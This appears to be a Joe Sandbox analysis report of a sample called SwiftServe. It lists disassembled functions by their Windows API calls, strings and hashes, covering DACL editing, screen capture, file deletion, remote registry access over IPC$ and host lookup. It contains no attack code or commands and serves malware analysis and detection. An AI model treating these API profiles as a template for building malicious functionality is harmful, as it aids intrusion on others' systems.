Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 4adc1640247d5fee79607cfb378c3cb4e4eeaa68619ed283ceaa26da0b7ee9cd
Instruction ID: 2d7664b1298e9dd67c0aa71cdd958f560c5e31c5ec150bf7953bd48f297cc781
Opcode Fuzzy Hash: 4adc1640247d5fee79607cfb378c3cb4e4eeaa68619ed283ceaa26da0b7ee9cd
Instruction Fuzzy Hash: 528180716082019FC724EF64CC449AAB7E8EF98314F14982EF98EE7291E730E944DB52

Function 00EAC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EAC8A4
GetFocus.USER32 ref: 00EAC8B4
GetDlgCtrlID.USER32(00000000), ref: 00EAC8BF
_memset.LIBCMT ref: 00EAC9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EACA15
GetMenuItemCount.USER32(?), ref: 00EACA35
GetMenuItemID.USER32(?,00000000), ref: 00EACA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EACA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EACAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EACAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EACB31

Strings

0, xrefs: 00EAC9E2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 3fdb5022f399735a923ce32a9bcb0c668d395989b348bf83b3b0002f5f795c08
Instruction ID: dc1929bf2951ef184af295d728cf5232afa33e186bcc377877c6d9d6f5a169bb
Opcode Fuzzy Hash: 3fdb5022f399735a923ce32a9bcb0c668d395989b348bf83b3b0002f5f795c08
Instruction Fuzzy Hash: 3D818E702083059FD720CF15D885A6BBBE8FB8D354F20592DF995BB291D731E905CBA2

Function 00E78ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E78E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78E3C
Part of subcall function 00E78E20: GetLastError.KERNEL32(?,00E78900,?,?,?), ref: 00E78E46
Part of subcall function 00E78E20: GetProcessHeap.KERNEL32(00000008,?,?,00E78900,?,?,?), ref: 00E78E55
Part of subcall function 00E78E20: HeapAlloc.KERNEL32(00000000,?,00E78900,?,?,?), ref: 00E78E5C
Part of subcall function 00E78E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E78E73

Part of subcall function 00E78EBD: GetProcessHeap.KERNEL32(00000008,00E78916,00000000,00000000,?,00E78916,?), ref: 00E78EC9
Part of subcall function 00E78EBD: HeapAlloc.KERNEL32(00000000,?,00E78916,?), ref: 00E78ED0
Part of subcall function 00E78EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E78916,?), ref: 00E78EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E78B2E
_memset.LIBCMT ref: 00E78B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E78B62
GetLengthSid.ADVAPI32(?), ref: 00E78B73
GetAce.ADVAPI32(?,00000000,?), ref: 00E78BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E78BCC
GetLengthSid.ADVAPI32(?), ref: 00E78BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E78BF8
HeapAlloc.KERNEL32(00000000), ref: 00E78BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E78C20
CopySid.ADVAPI32(00000000), ref: 00E78C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E78C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E78C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E78C92

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 07f385cd774ea23f2419225669c7929e271d534844927aeca2287a7c06aa49bd
Instruction ID: 93a7f9aa28357c3b50328a153b8569bc1fb34a59b3e529905479acebddbc778b
Opcode Fuzzy Hash: 07f385cd774ea23f2419225669c7929e271d534844927aeca2287a7c06aa49bd
Instruction Fuzzy Hash: 22617A75940209AFCF11DFA5DD48EEEBBB9FF14304F048669F919B6290DB31AA04CB60

Function 00E97A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E97A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E97A85
CreateCompatibleDC.GDI32(?), ref: 00E97A91
SelectObject.GDI32(00000000,?), ref: 00E97A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E97AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E97B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E97B52
SelectObject.GDI32(00000006,?), ref: 00E97B5A
DeleteObject.GDI32(?), ref: 00E97B63
DeleteDC.GDI32(00000006), ref: 00E97B6A
ReleaseDC.USER32(00000000,?), ref: 00E97B75

Strings

(, xrefs: 00E97AFA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: d66b372c97b73faa8aa326b7455c1d46dcb6ef0bc7865a3b784ba497f57053a2
Instruction ID: 7bac1cabfe1d52fdba757780d5723758f0e2eda8256f016737ef12e5be65f9c6
Opcode Fuzzy Hash: d66b372c97b73faa8aa326b7455c1d46dcb6ef0bc7865a3b784ba497f57053a2
Instruction Fuzzy Hash: D6514871A04309EFCB14CFA9DC85EAFBBB9EF48310F14851DF98AA7250D771A9458B60

Function 00E8A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E8A4D4

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00E8A4F6
__swprintf.LIBCMT ref: 00E8A54F
__swprintf.LIBCMT ref: 00E8A568
_wprintf.LIBCMT ref: 00E8A61E
_wprintf.LIBCMT ref: 00E8A63C

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00E8A619
"%s" (%d) : ==> %s:, xrefs: 00E8A637
^ ERROR, xrefs: 00E8A5C0
Line %d (File "%s"):, xrefs: 00E8A549, 00E8A562
Error: , xrefs: 00E8A5E6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: a375c1780259f4f54f0f0128b71871c6b9197113a5843e0dd25389a888cb6200
Instruction ID: 18ab3eb6d62a1da7e669f1a48ceb0fa733819a3586c8ce7f21d47ddb76814865
Opcode Fuzzy Hash: a375c1780259f4f54f0f0128b71871c6b9197113a5843e0dd25389a888cb6200
Instruction Fuzzy Hash: F2519471800209AADF15FBE0CD86EEEBBB9EF04340F1451AAF509721A1EB316F58DB51

Function 00E89710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8951A: __time64.LIBCMT ref: 00E89524

Part of subcall function 00E34A8C: _fseek.LIBCMT ref: 00E34AA4

__wsplitpath.LIBCMT ref: 00E897EF

Part of subcall function 00E4431E: __wsplitpath_helper.LIBCMT ref: 00E4435E

_wcscpy.LIBCMT ref: 00E89802
_wcscat.LIBCMT ref: 00E89815
__wsplitpath.LIBCMT ref: 00E8983A
_wcscat.LIBCMT ref: 00E89850
_wcscat.LIBCMT ref: 00E89863

Part of subcall function 00E89560: _memmove.LIBCMT ref: 00E89599
Part of subcall function 00E89560: _memmove.LIBCMT ref: 00E895A8

_wcscmp.LIBCMT ref: 00E897AA

Part of subcall function 00E89CF1: _wcscmp.LIBCMT ref: 00E89DE1
Part of subcall function 00E89CF1: _wcscmp.LIBCMT ref: 00E89DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E89A0D
_wcsncpy.LIBCMT ref: 00E89A80
DeleteFileW.KERNEL32(?,?), ref: 00E89AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E89ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E89ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E89AEF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: b8c17d1c2b59e95eb45e025d7d4363e758a1c00b38cf4b2d283cb46538fcfa36
Instruction ID: 8ba0d3bf8ba137fb3845350198b7fab7414b50fa8a7583f3f0b19fbf1bbad2bc
Opcode Fuzzy Hash: b8c17d1c2b59e95eb45e025d7d4363e758a1c00b38cf4b2d283cb46538fcfa36
Instruction Fuzzy Hash: C8C13EB1D00219AADF15EF95CC85AEEBBBDEF44300F0450AAF60DF6152EB709A448F65

Function 00E35BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E35BF1
GetMenuItemCount.USER32(00EE7890), ref: 00E70E7B
GetMenuItemCount.USER32(00EE7890), ref: 00E70F2B
GetCursorPos.USER32(?), ref: 00E70F6F
SetForegroundWindow.USER32(00000000), ref: 00E70F78
TrackPopupMenuEx.USER32(00EE7890,00000000,?,00000000,00000000,00000000), ref: 00E70F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E70F97

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 9198c58f8f681094e23f92f45407dd7b5155c56dae31f3255c8566ef9007991a
Instruction ID: ef0c40b1afe462dfc0887d35b03885e286bd938815aaec414f988807adc35e4a
Opcode Fuzzy Hash: 9198c58f8f681094e23f92f45407dd7b5155c56dae31f3255c8566ef9007991a
Instruction Fuzzy Hash: E171DF71605709BFEB309B55CC89FAAFFA4FB44368F105216F628BA2D0C7B16850DB90

Function 00E8AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00EB0980), ref: 00E8AF4E
GetDriveTypeW.KERNEL32(00000061,00EDB5F0,00000061), ref: 00E8B018
_wcscpy.LIBCMT ref: 00E8B042

Strings

removable, xrefs: 00E8AF80
ramdisk, xrefs: 00E8AFC2
all, xrefs: 00E8AF54
L,, xrefs: 00E8B03A
unknown, xrefs: 00E8AFD9
cdrom, xrefs: 00E8AF6A
network, xrefs: 00E8AFAC
fixed, xrefs: 00E8AF96

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-2946476599
Opcode ID: 8883212f37946551bb486acf4ece3d8024e62503feb84771721a652d27e71739
Instruction ID: b2a10663d35459e7c61544cbcb07eac930133ef8daa70515bcd467cd4589b737
Opcode Fuzzy Hash: 8883212f37946551bb486acf4ece3d8024e62503feb84771721a652d27e71739
Instruction Fuzzy Hash: ED51A1702043159FC310EF14D891AABB7E5EF94704F54692EF5997B2E2EB31AD09CB42

Function 00E783FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

_memset.LIBCMT ref: 00E78489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E784BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E784DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E784F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E78520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E78548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E78553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E78558

Strings

SOFTWARE\Classes\, xrefs: 00E7842A
\CLSID, xrefs: 00E78440
\IPC$, xrefs: 00E784A0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 667841b4356857b982b3e40df54b682971f55a63422652ed7d89597e65aa4c1f
Instruction ID: fe45907c6eeb9138955109c63ef4b641c1f29b61d8778e8554283b04b9aea500
Opcode Fuzzy Hash: 667841b4356857b982b3e40df54b682971f55a63422652ed7d89597e65aa4c1f
Instruction Fuzzy Hash: 9C41E972C5022DABCF15EBA4DC59DEEBBB9FF14340F045569E815B2161EB309E05CB90

Function 00EA147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA040D,?,?), ref: 00EA1491

Strings

HKEY_CURRENT_USER, xrefs: 00EA1570
HKCR, xrefs: 00EA1539
HKU, xrefs: 00EA15A3
HKLM, xrefs: 00EA150F
HKCC, xrefs: 00EA155F
HKEY_LOCAL_MACHINE, xrefs: 00EA14FA
HKEY_CURRENT_CONFIG, xrefs: 00EA154E
HKEY_CLASSES_ROOT, xrefs: 00EA1524
HKEY_USERS, xrefs: 00EA1592
HKCU, xrefs: 00EA1581

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: e9b9c1ad568c3646503b191cd8455a0f902f2c15a57ea1ffe5929e231e71481e
Instruction ID: 9874a4a4650ac34bcc238a579f905d74bf48f67ef61ad3d71184a4793b503338
Opcode Fuzzy Hash: e9b9c1ad568c3646503b191cd8455a0f902f2c15a57ea1ffe5929e231e71481e
Instruction Fuzzy Hash: 53413D3090425A8BDF04EF90E851AEA3764EF9A344F6064A5FD527F292DB30FD1ACB50

Function 00E85882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Part of subcall function 00E3153B: _memmove.LIBCMT ref: 00E315C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E858EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E85901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E85912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E85924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E85935

Strings

play PlayMe wait, xrefs: 00E8591F
open , xrefs: 00E8589A
close PlayMe, xrefs: 00E858FC, 00E85929
play PlayMe, xrefs: 00E85930
status PlayMe mode, xrefs: 00E858E6
alias PlayMe, xrefs: 00E858C4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 3b9eea78478db6b22dd0d420168e3d94b2d763843da671fa4fb5cbeff4bbd3d6
Instruction ID: c15748460f258b69958342612412d71bf101dca0590477cce4dfc828c0f6cc07
Opcode Fuzzy Hash: 3b9eea78478db6b22dd0d420168e3d94b2d763843da671fa4fb5cbeff4bbd3d6
Instruction Fuzzy Hash: A011B631540229F9D720B7A5CC4ADFF7FBCEBD1B50F40246EB415B21D0EEA01905C6A0

Function 00E84C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E84C27
gethostname.WSOCK32(?,00000100), ref: 00E84C41
gethostbyname.WSOCK32(?), ref: 00E84C4E
_wcscpy.LIBCMT ref: 00E84C76
_memmove.LIBCMT ref: 00E84C89
inet_ntoa.WSOCK32(?), ref: 00E84C94
_strcat.LIBCMT ref: 00E84CA2
_wcscpy.LIBCMT ref: 00E84CB9
WSACleanup.WSOCK32 ref: 00E84CC7
_wcscpy.LIBCMT ref: 00E84CD5

Strings

0.0.0.0, xrefs: 00E84C70

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: e35c3545568ae7201e7e65262e88bf199784608a2ee8c135f6a418f781f969a9
Instruction ID: d7d736a94ef4c1edda18e580a1daa6708fac0fe7406821d080815e2bc81e2513
Opcode Fuzzy Hash: e35c3545568ae7201e7e65262e88bf199784608a2ee8c135f6a418f781f969a9
Instruction Fuzzy Hash: 5111E771505219AFDB15B764AC4AEDBB7FCDF40710F0412AAF10CB61D1EF70AA858B50

Function 00E85530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00E85535

Part of subcall function 00E4083E: timeGetTime.WINMM(?,00000002,00E2C22C), ref: 00E40842

Sleep.KERNEL32(0000000A), ref: 00E85561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00E85585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E855A7
SetActiveWindow.USER32 ref: 00E855C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E855D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00E855F3
Sleep.KERNEL32(000000FA), ref: 00E855FE
IsWindow.USER32 ref: 00E8560A
EndDialog.USER32(00000000), ref: 00E8561B

Strings

BUTTON, xrefs: 00E85599

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 4c845a93ed4cee860426df0c95853e2a950dfc71451f7544836f2ae1f33b522d
Instruction ID: bbd536ea71c6b7c25d69e8bfc300ba406a7c31cbc57fd0710f561c5cfe9b2475
Opcode Fuzzy Hash: 4c845a93ed4cee860426df0c95853e2a950dfc71451f7544836f2ae1f33b522d
Instruction Fuzzy Hash: 2721D4B1104A48AFE7516B62EEC9A373B6BEB48385F002518F10DB51B1DF71AC5CDB61

Function 00E8DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

CoInitialize.OLE32(00000000), ref: 00E8DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E8DCC0
SHGetDesktopFolder.SHELL32(?), ref: 00E8DCD4
CoCreateInstance.OLE32(00EB3D4C,00000000,00000001,00EDB86C,?), ref: 00E8DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E8DD8F
CoTaskMemFree.OLE32(?,?), ref: 00E8DDE7
_memset.LIBCMT ref: 00E8DE24
SHBrowseForFolderW.SHELL32(?), ref: 00E8DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E8DE83
CoTaskMemFree.OLE32(00000000), ref: 00E8DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E8DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00E8DEC3

